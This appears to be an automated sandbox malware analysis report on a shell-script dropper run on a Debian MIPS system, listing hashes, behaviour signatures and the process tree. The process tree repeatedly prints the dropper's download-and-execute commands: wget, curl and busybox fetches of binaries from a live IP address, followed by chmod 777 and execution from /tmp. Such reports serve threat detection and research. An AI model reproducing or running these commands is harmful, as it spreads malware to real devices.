Analysis
-
max time kernel
56s -
max time network
58s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
-
submitted
01-11-2024 02:28
General
-
Target
1defa97bcc61fa80063c805f11d2bf73e79909cdba0baa2df21f2df1abaa033e.sh
-
Size
10KB
-
MD5
95086b1594ecb8d1d6f260c45e28a21c
-
SHA1
21511d843b85530f6b864ac7f71c20f01f1166b8
-
SHA256
1defa97bcc61fa80063c805f11d2bf73e79909cdba0baa2df21f2df1abaa033e
-
SHA512
757577fa6a5246c8ffe2cd896cf521257e0d3ccb384b4ebfc254716190bf903f7e3fc20c81237da47e0a2d020a9089e1a892c67f4876f89e6b78e09be3a72233
-
SSDEEP
96:N+2fK+qBBAtH4hHiRNonwem5y44fvopFA3/tSFppKEh0yiRNonwefO4fvopFbQ3l:r4hHe15y4g00y0J4l
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Reads runtime system information 28 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/1defa97bcc61fa80063c805f11d2bf73e79909cdba0baa2df21f2df1abaa033e.sh/tmp/1defa97bcc61fa80063c805f11d2bf73e79909cdba0baa2df21f2df1abaa033e.sh1⤵
-
/bin/rm/bin/rm bins.sh2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
-
/bin/chmodchmod 777 sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
- File and Directory Permissions Modification
-
/tmp/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl./sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
- Executes dropped EXE
-
/bin/rmrm sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
-
/bin/chmodchmod 777 V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
- File and Directory Permissions Modification
-
/tmp/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu./V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
- Executes dropped EXE
-
/bin/rmrm V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
-
/bin/chmodchmod 777 rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
- File and Directory Permissions Modification
-
/tmp/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48./rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
- Executes dropped EXE
-
/bin/rmrm rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
-
/bin/chmodchmod 777 kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
- File and Directory Permissions Modification
-
/tmp/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq./kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
- Executes dropped EXE
-
/bin/rmrm kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
-
/bin/chmodchmod 777 47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
- File and Directory Permissions Modification
-
/tmp/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt./47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
- Executes dropped EXE
-
/bin/rmrm 47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
-
/bin/chmodchmod 777 9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
- File and Directory Permissions Modification
-
/tmp/9KtuwmIyCu2831WrZTg35YWBSba74CicDw./9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
- Executes dropped EXE
-
/bin/rmrm 9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
-
/bin/chmodchmod 777 JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
- File and Directory Permissions Modification
-
/tmp/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx./JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
- Executes dropped EXE
-
/bin/rmrm JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
-
/bin/chmodchmod 777 mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
- File and Directory Permissions Modification
-
/tmp/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N./mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
- Executes dropped EXE
-
/bin/rmrm mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
-
/bin/chmodchmod 777 5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
- File and Directory Permissions Modification
-
/tmp/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5./5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
- Executes dropped EXE
-
/bin/rmrm 5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
-
/bin/chmodchmod 777 kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
- File and Directory Permissions Modification
-
/tmp/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf./kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
- Executes dropped EXE
-
/bin/rmrm kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
-
/bin/chmodchmod 777 hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
- File and Directory Permissions Modification
-
/tmp/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x./hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
- Executes dropped EXE
-
/bin/rmrm hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
-
/bin/chmodchmod 777 GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
- File and Directory Permissions Modification
-
/tmp/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY./GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
- Executes dropped EXE
-
/bin/rmrm GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
-
/bin/chmodchmod 777 RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
- File and Directory Permissions Modification
-
/tmp/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2./RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
- Executes dropped EXE
-
/bin/rmrm RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
-
/bin/chmodchmod 777 gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
- File and Directory Permissions Modification
-
/tmp/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf./gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
- Executes dropped EXE
-
/bin/rmrm gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
-
/bin/chmodchmod 777 5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
- File and Directory Permissions Modification
-
/tmp/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5./5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
- Executes dropped EXE
-
/bin/rmrm 5ULQittBiyVuc20xiOOqYHHZKvyjhCBie52⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
-
/bin/chmodchmod 777 kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
- File and Directory Permissions Modification
-
/tmp/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf./kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
- Executes dropped EXE
-
/bin/rmrm kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
-
/bin/chmodchmod 777 hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
- File and Directory Permissions Modification
-
/tmp/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x./hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
- Executes dropped EXE
-
/bin/rmrm hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
-
/bin/chmodchmod 777 JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
- File and Directory Permissions Modification
-
/tmp/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx./JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
- Executes dropped EXE
-
/bin/rmrm JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
-
/bin/chmodchmod 777 mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
- File and Directory Permissions Modification
-
/tmp/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N./mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
- Executes dropped EXE
-
/bin/rmrm mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
-
/bin/chmodchmod 777 GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
- File and Directory Permissions Modification
-
/tmp/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY./GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
- Executes dropped EXE
-
/bin/rmrm GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
-
/bin/chmodchmod 777 RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
- File and Directory Permissions Modification
-
/tmp/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2./RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
- Executes dropped EXE
-
/bin/rmrm RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj22⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
-
/bin/chmodchmod 777 gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
- File and Directory Permissions Modification
-
/tmp/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf./gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
- Executes dropped EXE
-
/bin/rmrm gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
-
/bin/chmodchmod 777 V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
- File and Directory Permissions Modification
-
/tmp/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu./V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
- Executes dropped EXE
-
/bin/rmrm V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
-
/bin/chmodchmod 777 rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
- File and Directory Permissions Modification
-
/tmp/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48./rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
- Executes dropped EXE
-
/bin/rmrm rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa482⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
-
/bin/chmodchmod 777 kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
- File and Directory Permissions Modification
-
/tmp/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq./kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
- Executes dropped EXE
-
/bin/rmrm kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
-
/bin/chmodchmod 777 sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
- File and Directory Permissions Modification
-
/tmp/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl./sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
- Executes dropped EXE
-
/bin/rmrm sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
-
/bin/chmodchmod 777 47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
- File and Directory Permissions Modification
-
/tmp/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt./47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
- Executes dropped EXE
-
/bin/rmrm 47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt2⤵
-
/usr/bin/wgetwget http://87.120.84.230/bins/9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
- Reads runtime system information
- Writes file to tmp directory
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
-
/bin/chmodchmod 777 9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
- File and Directory Permissions Modification
-
/tmp/9KtuwmIyCu2831WrZTg35YWBSba74CicDw./9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
- Executes dropped EXE
-
/bin/rmrm 9KtuwmIyCu2831WrZTg35YWBSba74CicDw2⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97